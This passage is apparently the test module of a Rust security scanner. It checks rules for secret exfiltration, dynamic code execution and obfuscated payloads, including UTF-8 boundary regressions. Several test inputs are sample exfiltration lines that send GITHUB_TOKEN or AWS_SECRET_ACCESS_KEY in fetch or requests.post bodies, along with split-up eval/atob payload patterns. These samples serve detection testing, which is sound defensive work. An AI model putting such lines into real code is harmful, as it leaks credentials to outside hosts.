1001            "/* headers: */ inside comment must NOT suppress body exfil"
1002        );
1003    }
1004
1005    #[test]
1006    fn test_exfil_regex_literal_headers_fires() {
1007        let input = r#"fetch(url, {body: /headers: \{/, json: process.env.GITHUB_TOKEN})"#;
1008        let findings = check(input, Some("test.js"));
1009        assert!(
1010            findings
1011                .iter()
1012                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1013            "/headers: .../ inside regex literal must NOT suppress"
1014        );
1015    }
1016
1017    #[test]
1018    fn test_exfil_regex_literal_authorization_fires() {
1019        let input = r#"fetch(url, {body: /Authorization: \[/, json: process.env.GITHUB_TOKEN})"#;
1020        let findings = check(input, Some("test.js"));
1021        assert!(
1022            findings
1023                .iter()
1024                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1025            "/Authorization: .../ inside regex literal must NOT suppress"
1026        );
1027    }
1028
1029    #[test]
1030    fn test_exfil_multiline_division_fires() {
1031        let input = "fetch(url, {body: 1\n/ 2, json: process.env.GITHUB_TOKEN})";
1032        let findings = check(input, Some("test.js"));
1033        assert!(
1034            findings
1035                .iter()
1036                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1037            "multiline division should not break parser"
1038        );
1039    }
1040
1041    #[test]
1042    fn test_exfil_multiline_paren_division_fires() {
1043        let input = "fetch(url, {body: (a\n/ b), json: process.env.GITHUB_TOKEN})";
1044        let findings = check(input, Some("test.js"));
1045        assert!(
1046            findings
1047                .iter()
1048                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1049            "parenthesized multiline division should not break parser"
1050        );
1051    }
1052
1053    #[test]
1054    fn test_find_call_end_multiline_division() {
1055        let input = b"url, {body: 1\n/ 2, val})";
1056        assert_eq!(find_call_end(input, 0), Some(24));
1057    }
1058
1059    #[test]
1060    fn test_exfil_postfix_increment_division_fires() {
1061        let input = r#"fetch(url, {body: a++ / 2, json: process.env.GITHUB_TOKEN})"#;
1062        let findings = check(input, Some("test.js"));
1063        assert!(
1064            findings
1065                .iter()
1066                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1067            "a++ / 2 should not break parser"
1068        );
1069    }
1070
1071    #[test]
1072    fn test_exfil_postfix_decrement_division_fires() {
1073        let input = r#"fetch(url, {body: a-- / 2, json: process.env.GITHUB_TOKEN})"#;
1074        let findings = check(input, Some("test.js"));
1075        assert!(
1076            findings
1077                .iter()
1078                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1079            "a-- / 2 should not break parser"
1080        );
1081    }
1082
1083    #[test]
1084    fn test_find_call_end_postfix_increment() {
1085        let input = b"url, {body: a++ / 2, val})";
1086        assert_eq!(find_call_end(input, 0), Some(26));
1087    }
1088
1089    #[test]
1090    fn test_find_call_end_postfix_decrement() {
1091        let input = b"url, {body: a-- / 2, val})";
1092        assert_eq!(find_call_end(input, 0), Some(26));
1093    }
1094
1095    #[test]
1096    fn test_exfil_postfix_inc_div_then_meta_no_fire() {
1097        let input = r#"fetch(url, {body: a++ / 2, meta: process.env.GITHUB_TOKEN})"#;
1098        let findings = check(input, Some("test.js"));
1099        assert!(
1100            !findings
1101                .iter()
1102                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1103            "secret in meta: after body: a++ / 2 should NOT fire"
1104        );
1105    }
1106
1107    #[test]
1108    fn test_exfil_postfix_dec_div_then_token_no_fire() {
1109        let input = r#"fetch(url, {body: a-- / 2, token: process.env.GITHUB_TOKEN})"#;
1110        let findings = check(input, Some("test.js"));
1111        assert!(
1112            !findings
1113                .iter()
1114                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1115            "secret in token: after body: a-- / 2 should NOT fire"
1116        );
1117    }
1118
1119    // Regression: UTF-8 boundary clamp around the proximity window.
1120    //
1121    // Without `safe_start`/`safe_end`, slicing the ±500-byte window could land
1122    // inside a multi-byte char (e.g. '═', 3 bytes) and panic with
1123    // "byte index N is not a char boundary". The tests below pin that down.
1124    #[test]
1125    fn test_safe_start_clamps_into_multibyte() {
1126        // '═' occupies bytes 0..3. Targeting bytes 1 or 2 should walk forward to 3.
1127        let s = "═ab";
1128        assert_eq!(safe_start(s, 0), 0);
1129        assert_eq!(safe_start(s, 1), 3);
1130        assert_eq!(safe_start(s, 2), 3);
1131        assert_eq!(safe_start(s, 3), 3);
1132    }
1133
1134    #[test]
1135    fn test_safe_end_clamps_into_multibyte() {
1136        // '═' occupies bytes 0..3. Targeting bytes 1 or 2 should walk back to 0.
1137        let s = "═ab";
1138        assert_eq!(safe_end(s, 0), 0);
1139        assert_eq!(safe_end(s, 1), 0);
1140        assert_eq!(safe_end(s, 2), 0);
1141        assert_eq!(safe_end(s, 3), 3);
1142    }
1143
1144    #[test]
1145    fn test_dynamic_code_no_panic_on_box_drawing_chars() {
1146        // Long tail of '═' (3 bytes each) so that mat.end()+500 lands inside a
1147        // box-drawing char. Pre-clamp, slicing the window panicked.
1148        // (Keyword strings split so source-scanning hooks don't trip on them.)
1149        let mut input = concat!("e", "val(x); a", "tob(y);\n// ").to_string();
1150        for _ in 0..250 {
1151            input.push('═');
1152        }
1153        let findings = check(&input, Some("test.js"));
1154        assert!(
1155            findings
1156                .iter()
1157                .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
1158            "dynamic-code pair should still fire when window edge lands inside a multi-byte char"
1159        );
1160    }
1161
1162    #[test]
1163    fn test_obfuscated_payload_no_panic_on_trailing_multibyte() {
1164        // Long base64 in decode() with trailing multi-byte chars past the proximity window.
1165        let b64 = "A".repeat(60);
1166        let mut input = String::new();
1167        input.push('e');
1168        input.push_str("val(a");
1169        input.push_str("tob(\"");
1170        input.push_str(&b64);
1171        input.push_str("\"));\n// ");
1172        for _ in 0..250 {
1173            input.push('═');
1174        }
1175        let findings = check(&input, Some("test.js"));
1176        assert!(
1177            findings
1178                .iter()
1179                .any(|f| f.rule_id == RuleId::ObfuscatedPayload),
1180            "obfuscated-payload detection should still fire with trailing multi-byte chars"
1181        );
1182    }
1183
1184    #[test]
1185    fn test_dynamic_code_no_panic_on_leading_multibyte() {
1186        // Multi-byte chars BEFORE the match exercise the start-side clamp:
1187        // `mat.start().saturating_sub(500)` can land inside a leading char.
1188        let mut input = String::new();
1189        for _ in 0..250 {
1190            input.push('═');
1191        }
1192        input.push_str(concat!("\ne", "val(x); a", "tob(y);\n"));
1193        let findings = check(&input, Some("test.js"));
1194        assert!(
1195            findings
1196                .iter()
1197                .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
1198            "dynamic-code pair should fire even when window start lands inside a leading multi-byte char"
1199        );
1200    }
1201
1202    #[test]
1203    fn test_js_exfil_no_panic_on_non_ascii_args() {
1204        // Multi-byte chars inside the string-literal args exercise the call_end
1205        // byte walker and the arg_span/snippet slices. Invariant: no panic.
1206        let input = r#"fetch("https://api.example.com/═══", {body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
1207        let _ = check(input, Some("test.js"));
1208    }
1209
1210    #[test]
1211    fn test_py_exfil_no_panic_on_non_ascii_args() {
1212        let input = r#"requests.post("https://api.example.com/═══", data=os.environ["AWS_SECRET_ACCESS_KEY"])"#;
1213        let _ = check(input, Some("test.py"));
1214    }
1215
1216    #[test]
1217    fn test_scan_plain_python_with_box_drawing_no_panic() {
1218        // Plain Python with box-drawing chars in a comment — no dynamic-code patterns,
1219        // should simply produce no findings (and never panic on the slice).
1220        let mut input = String::from("# ");
1221        for _ in 0..250 {
1222            input.push('═');
1223        }
1224        input.push_str("\nprint('hello')\n");
1225        let findings = check(&input, Some("test.py"));
1226        assert!(
1227            findings.is_empty(),
1228            "plain file with only box-drawing chars should produce no findings, got {findings:?}"
1229        );
1230    }
1231}